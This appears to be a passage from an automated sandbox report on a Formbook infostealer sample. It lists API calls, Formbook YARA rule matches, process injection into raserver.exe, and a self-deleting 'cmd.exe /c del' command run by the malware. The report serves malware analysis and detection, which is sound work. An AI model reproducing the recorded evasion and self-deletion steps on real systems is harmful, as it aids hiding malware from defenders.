Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999560 NtWriteFile,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999FE0 NtCreateMutant,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_0199A710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_0199A770 NtOpenThread,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999770 NtSetInformationFile,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999760 NtOpenProcess,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_019996D0 NtCreateKey,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999650 NtQueryValueKey,
Source: C:\Users\user\Desktop\XhU4EXUp0x.exe, Code function: 3_2_01999670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\raserver.exe, Code function: 12_2_04B495D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe, Code function: 12_2_04B49540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe, Code function: 12_2_04B496E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe, Code function: 12_2_04B496D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe, Code function: 12_2_04B49660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe, Code function: 12_2_04B49650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe, Code function: 12_2_04B49780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe, Code function: 12_2_04B49FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B4AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49560 NtWriteFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B497A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B4A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B4A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B498F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B4B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B499D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B4A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9D50 NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9E80 NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9E00 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9F30 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9DA9 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9E7A NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9F2D NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B5FB20
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B5C2B0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B594B0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B5F73D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E4E58
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E8E6A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4EBD68
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E6578
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4EA52C
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E4588
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E4240
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E8890
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E88A0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E8E5E
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E8EEC
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E8C8C
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E8C98
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041D069
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00401030
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041DA97
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041D5C9
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00402D8D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00402D90
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00409E2B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00409E30
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041DF79
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195F900
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01974120
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196B090
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A220A8
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A228EC
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2E824
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11002
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A830
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198EBB0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198ABD8
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1DBD2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A103DA
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A22B28
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197AB40
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A222AE
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A0FA2B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982581
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196D5E0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A225DD
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A22D07
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01950D20
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A21D55
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196841F
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1D466
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A21FF1
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2DFCE
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A22EF7
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01976E30
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1D616
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B1841F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCD466
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B32581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC2D82
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B1D5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD25DD
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B00D20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD2D07
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD1D55
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD2EF7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B26E30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCD616
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD1FF1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BDDFCE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B320A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD20A8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B1B090
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD28EC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2A830
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BDE824
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1002
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B299BF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B24120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B0F900
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD22AE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4AEF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BBFA2B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3EBB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BB23E3
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC03DA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3ABD8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCDBD2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD2B28
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2A309
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2AB40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AAD069
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AADA97
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00A92D8D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00A92D90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00A99E2B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00A99E30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00A92FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AADF79
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: String function: 0195B150 appears 87 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 04B0B150 appears 133 times
          Source: XhU4EXUp0x.exe, 00000000.00000002.657834635.0000000005920000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exe, 00000000.00000000.643332701.0000000000420000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameProfileOptimization.exe8 vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exe, 00000000.00000002.653237651.00000000009F0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exe, 00000003.00000002.707120497.0000000000F40000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameProfileOptimization.exe8 vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exe, 00000003.00000002.707570278.0000000001689000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameraserver.exej% vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exe, 00000003.00000002.708280098.0000000001BDF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exeBinary or memory string: OriginalFilenameProfileOptimization.exe8 vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: XhU4EXUp0x.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@2/2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XhU4EXUp0x.exe.logJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeMutant created: \Sessions\1\BaseNamedObjects\zheXInonhS
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2216:120:WilError_01
          Source: XhU4EXUp0x.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp | Binary or memory string: Select * from Clientes WHERE id=@id;;
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp | Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: XhU4EXUp0x.exe | Virustotal: Detection: 21%
          Source: XhU4EXUp0x.exe | ReversingLabs: Detection: 26%
          Source: unknown | Process created: C:\Users\user\Desktop\XhU4EXUp0x.exe 'C:\Users\user\Desktop\XhU4EXUp0x.exe'
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Process created: C:\Users\user\Desktop\XhU4EXUp0x.exe C:\Users\user\Desktop\XhU4EXUp0x.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\XhU4EXUp0x.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: XhU4EXUp0x.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: XhU4EXUp0x.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
